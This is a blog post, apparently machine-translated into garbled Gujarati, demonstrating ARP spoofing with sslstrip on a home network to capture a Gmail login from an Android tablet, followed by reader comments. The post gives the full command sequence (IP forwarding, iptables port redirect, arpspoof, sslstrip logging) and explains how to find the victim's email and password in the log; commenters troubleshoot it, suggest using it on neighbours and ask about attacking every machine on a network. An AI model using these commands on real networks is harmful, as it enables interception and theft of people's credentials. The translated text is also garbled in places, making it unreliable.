Pક્શનમાં આર્પ્સસ્ફૂફિંગ અને એસએસલસ્ટ્રિપ.

હેલો બ્લોગર્સ.

આજે મારી પાસે એક નાનો નમૂનો છે કે તે આપણામાંના ઘણાને ગમે તેવા કોઈપણ અસુરક્ષિત નેટવર્કથી કનેક્ટ થવું કેટલું જોખમી છે.

આજ માટે, હું Gmail પાસવર્ડ મેળવવા માટે Sslstrip સાથે આર્પ્સસ્ફૂફિંગનો ઉપયોગ કરીશ. પર્યાવરણને વધુ નિયંત્રિત કરવા માટે, મેં "એકાઉન્ટ" નામનું એકાઉન્ટ બનાવ્યું છેtestarp@gmail.com".

અને હું પ્રસ્તાવનાઓને ખૂબ પસંદ નથી કરતો, તેથી ચાલો આપણે વ્યવસાયમાં ઉતારો.

નીચેની માહિતી સાથે તેઓ શું કરી શકે તે માટે હું કોઈપણ સમયે જવાબદાર નથી. હું તે ફક્ત શૈક્ષણિક હેતુઓ માટે કરું છું

પર્યાવરણ

આ પરીક્ષણ માટે આપણી પાસે જે છે તે નીચે મુજબ છે:

1. હુમલો કરનાર: તે મારો ડેસ્કટ .પ અથવા ડેસ્કટ .પ કમ્પ્યુટર છે જેમાં ડેબિયન વ્હીઝી છે. રિપોઝીટરીઓમાંથી તમે ઇન્સ્ટોલ કરી શકો છો sslstrip y ડીએસનિફ મેળવવા માટે આર્પ્સપોફિંગ

2. પીડિત: પીડિત એ એન્ડ્રોઇડ ટેબ્લેટ છે જે ફક્ત તેના મેઇલને બ્રાઉઝર દ્વારા જોવા માંગે છે.

3. માધ્યમ: વચ્ચેનો મારો છે સિસ્કો DPC2425 રાઉટર

સરનામાંઓ.

હુમલો કરનારનું સરનામું: 172.26.0.2

રાઉટર સરનામું: 172.26.0.1

પીડિતનું સરનામું: 172.26.0.8

હુમલો:

હુમલો કેવી રીતે કાર્ય કરે છે તે સમજવા માટે, તમે મારા જૂનામાં જઈ શકો છો પોસ્ટ

આ હુમલા માટે આપણે પ્રથમ વસ્તુ કરીશું તે ફોરવર્ડને સક્રિય કરવું છે જેથી અમારું કમ્પ્યુટર પીડિતાને તેઓની સમજ્યા વિના માહિતી મોકલી શકે. (અન્યથા તે સેવાઓનો હુમલો નામંજૂર હશે)

તેના માટે આપણે ઉપયોગ કરીશું:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

સીધી કન્સોલ વિંડોમાં દરેક આદેશ.

હવે જો આપણે tail -f કરીએ desdelinux અમે માહિતીને જીવંત અને સીધી જોઈ શકીએ છીએ

સ્નેપશોટ 1

તો પછી આપણે જે જોઈએ છે તે કેવી રીતે મેળવી શકીએ?

ચાલો પહેલા ટેબ્લેટ પર અમારા મેઇલ દાખલ કરીએ. લ inગ ઇન કરતી વખતે, આપણે જોઈએ છીએ કે આપણા કન્સોલ પર હજારો અને હજારો વસ્તુઓ દેખાય છે.

હવે તે પૂર્ણ થઈ ગયું છે, ચાલો આપણી ફાઈલ ખોલીએ.desdelinux"નેનો સાથે

nano desdelinux

કંટ્રોલ + ડબલ્યુ વડે આપણે સેક્યુઅર પોસ્ટ નામની કોઈ વસ્તુ શોધીએ છીએ.

અને આપણે આ કંઈક જોશું.

સ્નેપશોટ 2

તે વિશાળ લાઇનની વચ્ચે જે જોઇ શકાતી નથી તે પીડિતાનું ઇમેઇલ અને પાસવર્ડ છે.

તેથી અમે જમણી તરફ દોડીએ ત્યાં સુધી આપણે આખરે ટનલના અંતમાં પ્રકાશ જોતા નથી.

સ્નેપશોટ 3

બીજા પ્રસંગે આપણે જોશું કે આ હુમલાઓથી આપણે પોતાને થોડું કેવી રીતે સુરક્ષિત રાખી શકીએ.

સાદર


તમારી ટિપ્પણી મૂકો

તમારું ઇમેઇલ સરનામું પ્રકાશિત કરવામાં આવશે નહીં. આવશ્યક ક્ષેત્રો સાથે ચિહ્નિત થયેલ છે *

*

*

  1. ડેટા માટે જવાબદાર: મિગ્યુએલ gelંજેલ ગેટóન
  2. ડેટાનો હેતુ: નિયંત્રણ સ્પામ, ટિપ્પણી સંચાલન.
  3. કાયદો: તમારી સંમતિ
  4. ડેટાની વાતચીત: કાયદાકીય જવાબદારી સિવાય ડેટા તૃતીય પક્ષને આપવામાં આવશે નહીં.
  5. ડેટા સ્ટોરેજ: cસેન્ટસ નેટવર્ક્સ (ઇયુ) દ્વારા હોસ્ટ કરેલો ડેટાબેઝ
  6. અધિકાર: કોઈપણ સમયે તમે તમારી માહિતીને મર્યાદિત, પુન recoverપ્રાપ્ત અને કા deleteી શકો છો.

  1.   - જેએલસીમક્સ જણાવ્યું હતું કે

    હું આ તક કહે છે કે જ્યારે પોસ્ટ પ્રકાશિત કરવામાં આવી હતી, ત્યારે આદેશો યોગ્ય ન હતા.

    અંતે iptables આદેશ 8080 ખૂટે છે જે બીજી લાઇન પર છે. અને પછી આર્પ્સપૂફ કમાન્ડ્સ બધા સમાન લીટી પર હતા. દરેક આદેશ અલગ લાઇન પર હોય છે.

    આશા છે કે સંપાદક તેને જુએ છે અને તેને ઠીક કરી શકે છે.

    શુભેચ્છાઓ.

    1.    મેન્યુઅલ દ લા ફુએન્ટે જણાવ્યું હતું કે

      તમે સુધારેલ સુધારાઓ મેં કર્યા છે, તે ઠીક છે?

      જો તમે પસંદ કરેલી એન્ટ્રીમાં કોડ દાખલ કરવા જઇ રહ્યા છો, તો HTML વ્યુનો ઉપયોગ કરો, અને તેને બાકી પર મોકલતા પહેલા લેખ યોગ્ય છે કે નહીં તેની ખાતરી કરો. આભાર.

  2.   લુઈસ જણાવ્યું હતું કે

    તે જાણીને આનંદદાયક છે કે આપણામાં જે લોકો પાસે જ્ knowledgeાન નથી તે ખૂબ જ સંવેદનશીલ છે. જ્યારે હું આ વિષયનો બહુ ઓછો સમજતો હોઉં ત્યારે પણ ખૂબ સારી માહિતી મને મહત્વનું ભાન થાય છે. આભાર!
    સાદર

  3.   ગિસકાર્ડ જણાવ્યું હતું કે

    પરંતુ તે ફક્ત ત્યારે જ કાર્ય કરે છે જો હુમલો કરનાર અને પીડિતા એક જ નેટવર્ક પર હોય. કોઈ પણ સંજોગોમાં, મને એવું લાગે છે કે જો (તે જ નેટવર્ક પર હોવાને કારણે) તમે HTTPS નો ઉપયોગ કરીને કનેક્ટ કરો છો જે બનતું નથી કારણ કે તમારા મશીનને છોડતા પહેલા ડેટા એન્ક્રિપ્ટ થયેલ છે. જો તમે HTTP (એસ વગર) થી કનેક્ટ થાઓ છો, તો મને લાગે છે કે નેટવર્ક કેબલને પણ જોતાં તમે કીઓ જોશો.

    1.    - જેએલસીમક્સ જણાવ્યું હતું કે

      તે સાચું નથી. હું જીમેલ પાસવર્ડ હેક કરું છું અને જો તમને ખબર પડે કે જીમેલ https નો ઉપયોગ કરે છે. તો? મુદ્દો એ છે કે https સુરક્ષિત હોવા છતાં, તે http પર આધારિત છે. તેથી તે એટલું સલામત નથી.

      કોઈ https વિશે એટલું કબૂલ કરશો નહીં કે એસ સુપરમેન માટે નથી તે "સલામત" માટે છે

    2.    આરટેન જણાવ્યું હતું કે

      તે https સાથે અથવા તેના વગર કાર્ય કરે છે, મેં તેને વધુ વિશિષ્ટ લિનોક્સ ડિસ્ટ્રોથી અજમાવ્યું છે અને તે સમસ્યાઓ વિના કાર્ય કરે છે

    3.    મેન્યુઅલ દ લા ફુએન્ટે જણાવ્યું હતું કે

      જે લોકો તમારું Wi-Fi ચોરી કરે છે તેમને પાઠ ભણાવવા માટે તમે તેનો ચોક્કસપણે ઉપયોગ કરી શકો છો. 😀

      તે ચેમા onલોન્સોના બ્લોગ પર લાંબા સમય પહેલા કહ્યું હતું તેવું વધુ કે ઓછું છે:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    રેયોનન્ટ જણાવ્યું હતું કે

        ઓસ્ટિયા, તે શું કરે છે તે મહાન છે! / અને પછી જ્યારે તેઓ બેંક ખાતાને તપાસવા જાય છે ત્યારે હું વીપીએનનો ઉપયોગ કરું છું ત્યારે તેઓ મારા પેરાનોઇડને કહે છે…). માર્ગ દ્વારા, તમારે જોવાનું છે કે ટિપ્પણીઓમાં કેવી રીતે ઉદ્ધત લોકો છે ... જો અંતમાં તે ચોરી કરે છે ...

        1.    ઇલિયોટાઇમ 3000 જણાવ્યું હતું કે

          હવે તમારે તમારી પોતાની વીપીએન સેવા કેવી રીતે બનાવવી અને ઓફર કરવી તે વિશેનું ટ્યુટોરિયલ લેવાની જરૂર છે.

      2.    ડેનિયલ જણાવ્યું હતું કે

        વાર્તા કે જે તમે લિંક કરો છો તે ખૂબ જ રસપ્રદ છે, તે એક નવલકથા પુસ્તકને પણ લાયક લાગે છે, અને આ મને યાદ કરે છે જ્યારે હું મારા પડોશીઓના ઇન્ટરનેટનો ઉપયોગ કરતો હતો અને તેમ છતાં હું કહું છું કે હું આ વિષય જાણું છું, મને લાગે છે કે મને લાગેલા જોખમના સાચા પરિમાણો હું ક્યારેય નહીં જોઈ શકું. છેલ્લે, સદભાગ્યે મારા માટે, તેઓએ ફક્ત પાસવર્ડ WPA2 માં બદલ્યો અને તે જ અહીંથી ISP સાથેની મારી વાર્તા શરૂ થઈ

    4.    Mauricio જણાવ્યું હતું કે

      તેથી જ શીર્ષક ક્રિયામાં Sslstrip કહે છે.

      જ્યાં સુધી હુમલાખોર મધ્યમાં હોય ત્યાં સુધી તે કાર્ય કરે છે

  4.   અનન જણાવ્યું હતું કે

    તમે પ્રિઝમ પર કયા તરંગનું કામ કરો છો? -.--
    નં.
    તમે તમારી વિનંતી XD મોકલવા માટે રાહ જુઓ છો
    સાદર
    સારી પોસ્ટ

  5.   Urરોસઝેક્સ જણાવ્યું હતું કે

    રસપ્રદ, હું પછી શૈક્ષણિક પરીક્ષણ કરીશ ... કદાચ હું વાઇફાઇનો પાસવર્ડ પણ કા removeી શકું છું અને થોડી વાર માટે આનંદ પણ કરી શકું છું 😛
    કોઈપણ તક દ્વારા, તમે લક્ષ્ય વિનંતી કરેલા પૃષ્ઠોને વિવિધ પૃષ્ઠો મોકલવા માટે કંઈક આવું કરી શકો છો? ઉદાહરણ તરીકે, તેઓ ફેસબુક ખોલવા માગે છે અને હું તેમને Google પર રીડાયરેક્ટ કરું છું? 😛

    1.    - જેએલસીમક્સ જણાવ્યું હતું કે

      હા. પરંતુ તે બધા ખૂબ જ અલગ રોલ છે.

      કદાચ હું પછીથી પોસ્ટ કરીશ.

  6.   છેલ્લા નવા જણાવ્યું હતું કે

    ખૂબ સારી પોસ્ટ, આ મુદ્દાઓ ખૂબ જ શૈક્ષણિક છે, હવે આપણે આ હુમલો સામે લડવામાં સમર્થ બનવાની જરૂર છે, કેમ કે કેટલાક (મારા જેવા) જાહેર નેટવર્કથી કનેક્ટ થાય છે (ઉદાહરણ તરીકે યુનિવર્સિટી) તે ટાળવા માટે મદદરૂપ થશે.

    આભાર!

  7.   just-other-dl-વપરાશકર્તા જણાવ્યું હતું કે

    તે મારા માટે કામ કરતું નથી 🙁

  8.   વqકર જણાવ્યું હતું કે

    કંઈક અહીં મને નિષ્ફળ કરે છે, એ સિવાય કે https કનેક્શંસ સર્વર પ્રમાણપત્ર દ્વારા એન્ક્રિપ્ટ થયેલ છે (એકવાર તમારી પાસે તમારા મશીન પરનું પ્રમાણપત્ર છે, તમારું બ્રાઉઝર એન્ક્રિપ્શનનો હવાલો છે) તમે 80પ્ટેબલ્સ સાથે પોર્ટ 443 (HTTP) ને રીડાયરેક્ટ કરો, XNUMX નહીં છે, જે https છે

    1.    - જેએલસીમક્સ જણાવ્યું હતું કે

      મેં પણ વિચાર્યું. મુદ્દો એ છે કે જોકે https "સુરક્ષિત" છે, પરંતુ તે કમનસીબે, http પર આધારિત છે. તેથી sslstrip તેનો લાભ લે છે, તે બ્રાઉઝરને માને છે કે તે https ઓળખપત્રોનો ઉપયોગ કરે છે પરંતુ તે નથી.

      1.    વqકર જણાવ્યું હતું કે

        પવિત્ર છી! પરંતુ બ્રાઉઝરને ચેતવણી જોવી જોઈએ કે "આ પ્રમાણપત્ર કોઈ શંકાસ્પદ સાઇટથી આવે છે અથવા તેવું કંઈક આવે છે" ... મારે નિશ્ચિતપણે XD પરીક્ષણો કરવા પડશે

        1.    - જેએલસીમક્સ જણાવ્યું હતું કે

          ના, એકદમ કશું બહાર આવતું નથી.

  9.   just-other-dl-વપરાશકર્તા જણાવ્યું હતું કે

    તે છેવટે મારા માટે કામ કર્યું
    હું પાસવર્ડ સાથે ડબ્લ્યુઇપી નેટવર્ક પર કનેક્ટેડ છું, અને તે મને કોઈપણ રીતે સીધો પાસવર્ડ બતાવ્યો.

    એક ક્વેરી શું તમે આ જ પ્રક્રિયા કરી શકો છો પરંતુ નેટવર્કમાં કનેક્ટ થયેલા બધા કમ્પ્યુટર માટે, એક પણ ભોગ બનવાને બદલે?

    1.    - જેએલસીમક્સ જણાવ્યું હતું કે

      હા તમે કરી શકો છો. પરંતુ મેં પ્રયોગો કર્યા નથી. તેનો પ્રયાસ જાતે કરો અને અમને કહો કે તમે શું કરી રહ્યા છો.

  10.   સિનિકિક ​​19 જણાવ્યું હતું કે

    આની સાથે જ મને મળે છે કે પીડિતાનું મશીન offlineફલાઇન જાય છે, પરંતુ sslstrip મને કશું બતાવતું નથી: /

    1.    - જેએલસીમક્સ જણાવ્યું હતું કે

      તમારે એક ક્ષણ માટે ફાયરવ .લને અક્ષમ કરવાની જરૂર છે. અથવા ઓછામાં ઓછા આવતા જોડાણોને સક્ષમ કરો.

  11.   શ્રી કાળા જણાવ્યું હતું કે

    ચકાસણી અને હું ફક્ત ફેસબુક પૃષ્ઠના વપરાશકર્તા નામ અને પાસવર્ડને જોઈ શક્યો, જી-મેઇલમાં મને લ logગમાં કોઈ પરિણામ મળ્યું નથી, પણ મને ફક્ત આર્પ્સપોફ «આર્પ્સપૂફ -i -t« ની લાઇનની જરૂર છે. બીજી બાજુ, પીડિત મશીન કેટલાક પૃષ્ઠોને ખોલી શકી નથી. હું તપાસ ચાલુ રાખીશ, તે ખૂબ જ રસપ્રદ છે. જે લોકો માંજારોનો ઉપયોગ કરે છે તેના માટે મદદ, સ્થાપિત કરવા માટેના પેકેજો આ છે: ડીએસનીફ (અહીં આર્પ્સપoffફ છે), ટ્વિસ્ટેડ અને પાયથોન 2-પાયોપેન્સલ. Sslstrip અહીંથી ડાઉનલોડ કરી શકાય છે: http://www.thoughtcrime.org/software/sslstrip/
    તેને ચલાવવા માટે $ python2 sslstrip.py
    શુભેચ્છાઓ.

  12.   શ્રી કાળા જણાવ્યું હતું કે

    તે બહાર આવ્યું ન હતું પરંતુ આર્મ્સપૂફ લાઇન છે: #arpspoof -i int -t ip-ભોગ આઇપ-રાઉટર

  13.   ગિલ્બર્ટ જણાવ્યું હતું કે

    જુઓ હું તમને કહે તે જ કરું છું:

    ઇકો "1"> / પ્રોક / સીએસ / નેટ / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp est ડિસ્ટિનેશન-પોર્ટ 80 -j રીડિરેક્ટ –ટુ બંદરો 8080

    આર્પ્સપોફ -i એથ0 -t 172.26.0.8 172.26.0.1
    આર્પ્સપોફ -i એથ0 -t 172.26.0.1 172.26.0.2

    સમસ્યા એ છે કે ભોગ બનનાર, જે અહીં મારા ઓરડામાં છે તે બીજો પીસી છે, જે મારે રાઉટરને ફરીથી પ્રારંભ કરવો પડશે, તેના સંપર્ક વિના મને છોડી દેવામાં આવે છે, હું શું કરી શકું છું, મને મદદ કરો.

    બીજી વસ્તુ જે હું વર્ચુઅલ મશીન સાથે કામ કરું છું, અને જ્યારે હું iwconfig આદેશ ચલાવુ છું, ત્યારે wlan0 દેખાતું નથી, અથવા જ્યારે હું ifconfig ચલાવીશ, તેમ છતાં, જો મારી પાસે વર્ચુઅલ મશીન પર ઇન્ટરનેટ છે, તો એથ 0 ઇન્ટરફેસ સાથે શું છે.